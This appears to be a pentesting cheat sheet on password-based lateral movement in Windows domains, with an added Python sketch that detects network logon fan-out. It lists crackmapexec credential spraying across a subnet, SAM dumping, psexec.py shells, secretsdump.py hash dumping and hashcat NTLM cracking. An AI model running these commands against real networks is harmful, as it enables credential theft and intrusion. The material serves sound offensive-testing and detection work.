Pass the Password
The basic syntax using crackmapexec (version 4 and later take the protocol, here smb, as the first argument):
crackmapexec smb <entire network ip>/<cidr> -d domain -u user -p password
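Seen from the defender's side, a run like the one above shows up as successful network logons (Event ID 4624, logon type 3) for one account from one source address on many hosts within seconds. The detection sketch below is an added example, not part of the original page; the event tuples, the 60-second window and the threshold of 4 hosts are constructed assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events, not real logs:
# (time, target host, event id, logon type, account, source IP)
EVENTS = [
    ("2024-01-10T09:00:01", "WS01", 4624, 3, "CORP\\svc_backup", "10.0.0.50"),
    ("2024-01-10T09:00:02", "WS02", 4624, 3, "CORP\\svc_backup", "10.0.0.50"),
    ("2024-01-10T09:00:03", "WS03", 4624, 3, "CORP\\svc_backup", "10.0.0.50"),
    ("2024-01-10T09:00:04", "WS04", 4624, 3, "CORP\\svc_backup", "10.0.0.50"),
    ("2024-01-10T09:00:05", "WS05", 4624, 3, "CORP\\svc_backup", "10.0.0.50"),
    # Ordinary use: one user, two servers.
    ("2024-01-10T09:00:10", "FS01", 4624, 3, "CORP\\alice", "10.0.0.21"),
    ("2024-01-10T09:00:40", "DC01", 4624, 3, "CORP\\alice", "10.0.0.21"),
    # Repeated logons to the same host do not count as fan-out.
    ("2024-01-10T09:01:00", "FS01", 4624, 3, "CORP\\bob", "10.0.0.22"),
    ("2024-01-10T09:01:05", "FS01", 4624, 3, "CORP\\bob", "10.0.0.22"),
    # Four hosts, but spread over hours: outside the window.
    ("2024-01-10T09:00:00", "APP1", 4624, 3, "CORP\\carol", "10.0.0.23"),
    ("2024-01-10T10:00:00", "APP2", 4624, 3, "CORP\\carol", "10.0.0.23"),
    ("2024-01-10T11:00:00", "APP3", 4624, 3, "CORP\\carol", "10.0.0.23"),
    ("2024-01-10T12:00:00", "APP4", 4624, 3, "CORP\\carol", "10.0.0.23"),
    # Interactive logon (type 2) is ignored.
    ("2024-01-10T09:00:06", "WS06", 4624, 2, "CORP\\svc_backup", "10.0.0.50"),
]

def detect_fanout(events, window=timedelta(seconds=60), threshold=4):
    """Return {(account, source_ip): hosts} for every account that logged on
    over the network from one source to >= threshold distinct hosts in window."""
    recent = defaultdict(deque)  # (account, source) -> (time, host) inside window
    alerts = {}
    for ts, host, event_id, logon_type, account, src in sorted(events):
        if event_id != 4624 or logon_type != 3:
            continue  # only successful network logons
        now = datetime.fromisoformat(ts)
        queue = recent[(account, src)]
        queue.append((now, host))
        while now - queue[0][0] > window:  # drop entries older than the window
            queue.popleft()
        hosts = {h for _, h in queue}
        if len(hosts) >= threshold:
            alerts.setdefault((account, src), set()).update(hosts)
    return alerts

if __name__ == "__main__":
    for (account, src), hosts in detect_fanout(EVENTS).items():
        print(f"{account} from {src}: {len(hosts)} hosts {sorted(hosts)}")
```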
I also recommend checking this article to learn a bit more about the usage of cme:
Once you have the pwn3d machines, you can use psexec or similar, or even use some of the modules and options provided by crackmapexec, as shown in the blog. For example:
To dump the SAM file (it depends, sometimes it doesn't work):
crackmapexec smb <entire network ip>/<cidr> -d domain -u user -p password --sam
psexec:
psexec.py domain/username:password@ip_of_the_machine
secretsdump to dump hashes:
secretsdump.py domain/username:password@ip_of_the_machine
Once you have dumped that and have the NTLM hashes, you can use, for example, hashcat to crack them (basic command):
hashcat -m 1000 hashfile dict_file -O
You can find more of this cool stuff here: